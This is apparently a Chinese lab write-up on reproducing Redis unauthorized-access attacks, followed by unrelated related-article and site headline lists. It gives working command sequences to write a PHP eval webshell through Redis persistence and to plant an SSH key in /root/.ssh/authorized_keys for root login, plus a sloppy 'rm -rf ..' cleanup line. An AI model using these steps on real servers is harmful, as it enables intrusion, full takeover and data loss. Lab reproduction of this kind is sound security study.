目录

利用无口令远程登陆redis

利用Redis的持久化写webshell

安装

复现

Redis 利用持久化,利用“公私钥“认证获取root权限


利用无口令远程登陆redis

开了web服务器,并且知道对方IP地址就可以

./redis-server ../redis.conf./redis-cli -h 192.168.0。0[目标靶机地址]


利用Redis的持久化写webshell

安装

由于靶场没有开启web服务器,配置好apache和php

firewall-cmd --zone=public --add-port=80/tcp --permanent   #开启80端口systemctl restart firewalld.service    #重启反获取yum install php php-mysql -y   php -v

vi /etc/httpd/conf/httpd.conf 在配置文件中,添加如下内容:

AddType application/x-httpd-php-source .phpsAddType application/x-httpd-php .php

php -vcd /var/www/htmlvi info.php   #新建并编写info.php文件   内容为<? php phpinfo() ?>systemctl restart httpd   #重启httpd服务

在其他计算机里测试 ip地址/info.php  如出现PHP version界面,则成功

复现

靶机Redis链接未授权,在攻击机上能用redis-cli连上,如上图,并未登陆验证

要开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限(我们可以将dir设置为一个目录A,而dbfilename为文件名B,再执行save或bgsave,则我们就可以写入一个路径为/A/B的任意文件。)

在html目录下写入一个test.php的木马文件:

攻击机写下如下redis命令

写一句话木马

Config set dbfilename test1.phpset webshell "\r\n\r\n<?php @eval($_POST['caidao']);?>\r\n\r\n"Save

打开菜刀进行连接到有一句话木马的文件里

双击菜刀首页的那个连接,就能获得所有的网站的文件内容


Redis 利用持久化,利用“公私钥“认证获取root权限

靶机要启动进入redis.cli服务里

在攻击机(redis客户端)中生成ssh公钥和私钥,密码设置为空:

ssh-keygen -t rsa

会有一堆问题,但不用管 回车跳过就可以了

进入/root/.ssh目录: 将生成的公钥保存到1.txt:

cd /root/.ssh(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt

连接目标服务器上的Redis服务,将保存的公钥1.txt写入Redis

使用redis-cli -h ip命令连接靶机,将文件写入:

# 这里试了很多次一直出现下图错误,手打一遍才成功,有如下问题的,可以试一试

实际上是靶机没有.ssh程序 在靶机上安装一个即可

cat 1.txt | redis-cli -h [靶机ip地址] -x set crack

因为我此时在的路径里只有1.txt,没有redis服务,所以在管道符后面补充了redis所在的路径成功

接下来redis连接目标靶机,进入redis存放路径的src路径里,并执行以下操作

# 如果config set dir /root/.ssh 此条命令出错,新打开一条终端,进入ssh目录下,再试一遍

./redis-cli -h 192.168.0.0[靶机ip地址]config set dir /root/.ssh     #更改Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh)CONFIG SET dbfilename authorized_keys   #设置上传公钥的备份文件名字为authorized_keyssave     #保存quit

在靶机上查看一下ssh目录里是否有authorized_keys文件

此时在攻击机上使用SSH免密登录靶机,利用私钥成功登入redis服务器:

ssh -i id_rsa root@192.168.0.0[目标靶机ip地址]

登陆靶机服务器,获得root权限成功

#注意:所有操作皆在攻击机(客户机)里操作,靶机只需要进入redis.cli中以及查询ssh中是否有authorized_keys文件即可。


如果有些操作一直错误,可以重头来一遍   需执行以下命令(攻击机、靶机都要删干净)

cd /root/.sshrm -rf ..    # 把ssh里的所有文件都删掉   a* 以a开头的所有文件

删干净之后就可以重新来了。(我试了n遍才做出来,大家不要着急,慢慢来(#^.^#))

Redis未授权访问漏洞复现(三种方式)相关推荐

  1. 漏洞检测与防御:Redis未授权访问漏洞复现

    漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...

  2. Redis未授权访问漏洞复现

    Redis介绍 redis是一个key-value存储系统.和Memcached类似,它支持存储的value类型相对更多,包括string(字符串).list(链表).set(集合).zset(sor ...

  3. Redis未授权访问漏洞复现与利用

    1.漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果 ...

  4. 未授权访问漏洞-Redis未授权访问漏洞

    文章目录 未授权概述 常见未授权访问漏洞 Redis未授权访问 Redis简介 应用场景 Redis 架构 漏洞发现 端口 端口探测 Redis常用命令 Redis历史漏洞 Redis未授权访问 Re ...

  5. Redis未授权访问漏洞的重现与利用

    前言: 最近配置openvas的时候安装了redis,听说曾经曝出过一个未授权访问漏洞,便找了一下相关资料想自己动手复现一下漏洞的利用过程,当然所有的攻击性操作都是在虚拟机上完成的,本文所有的操作是在 ...

  6. Redis未授权访问漏洞的利用及防护

    什么是Redis未授权访问漏洞? Redis在默认情况下,会绑定在0.0.0.0:6379.如果没有采取相关的安全策略,比如添加防火墙规则.避免其他非信任来源IP访问等,这样会使Redis服务完全暴露 ...

  7. Redis未授权访问漏洞记录(端口:6379)

    目录 Redis 扫描 未授权登录以及利用 写入SSH公钥,进行远程登录 定时任务反弹shell 写入一句话木马 其它一句话木马 ​ 写入/etc/passwd文件 利用主从复制RCE ​ 本地Red ...

  8. Redis未授权访问漏洞详细版

    Redis未授权访问漏洞 Redis未授权访问漏洞原理 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样 ...

  9. Redis未授权访问漏洞(四)SSH key免密登录

    前言 系列文章 Redis未授权访问漏洞(一)先导篇 Redis未授权访问漏洞(二)Webshell提权篇 Redis未授权访问漏洞(三)Redis写入反弹连接定时任务 SSH key免密登录 实战实 ...

最新文章

  1. linux 裸设备 逻辑卷,Linux通过逻辑卷使用裸设备
  2. Unity3D 2D游戏中寻径算法的一些解决思路
  3. Python面向对象中super用法与MRO机制
  4. java.lang.OutOfMemoryError: GC overhead limit exceeded
  5. 算法“视”界杯上演十强争锋,大赛终极一战圆满落幕
  6. 用于安全连接 Microsoft 365 的 Mimecast 数字证书被盗
  7. 数据挖掘:模型选择——K-means
  8. 计算机数字模拟仿真软件,实时数字仿真系统
  9. php libxml安装,关于linux 安装libxml2
  10. 施工部署主要不包括_施工部署编制内容不包括( )_学小易找答案
  11. WordPress外贸建站多语言翻译插件推荐
  12. 常微分二阶线性齐次微分方程的通解推导
  13. android流光字体实现,CSS3自定义动画实现流光文字特效
  14. 如何在视频中加水印?分享这些实用的加水印方法给你
  15. 进程之间的通信(管道详解)
  16. Python 分组处理
  17. 其实,Face ID只是iPhone X TrueDepth相机的冰山一角
  18. STM32 读保护的实现
  19. 饥荒linux 中文版下载,饥荒哈姆雷特手机版
  20. MySQL讲义第 39 讲——select 查询之函数(2):日期时间型函数

热门文章

  1. i5 13500H 和 i7 1270p差多少 i513500H 和 i71270p对比
  2. 【单片机开发】无FIFO的OV7670模组在STM32F1平台上的应用
  3. Google Cloud Spanner 究竟是什么?
  4. abstract 是什么意思?
  5. 医院项目-预约挂号-第一部分
  6. 广东海洋大学微型计算机考试,广东海洋大学微型计算机基础中断及优先级实验报告...
  7. 仁微电子蓝牙物联网赋能智慧医院,助力上海市皮肤病医院新楼打造“5G+医疗健康应用试点”
  8. 找了几个 Solon 框架的商业落地项目案例!
  9. “飞秋”的生存空间是否会受到挤压?
  10. 华丽焕新,不同以“网” | 企企通新版官网正式亮相!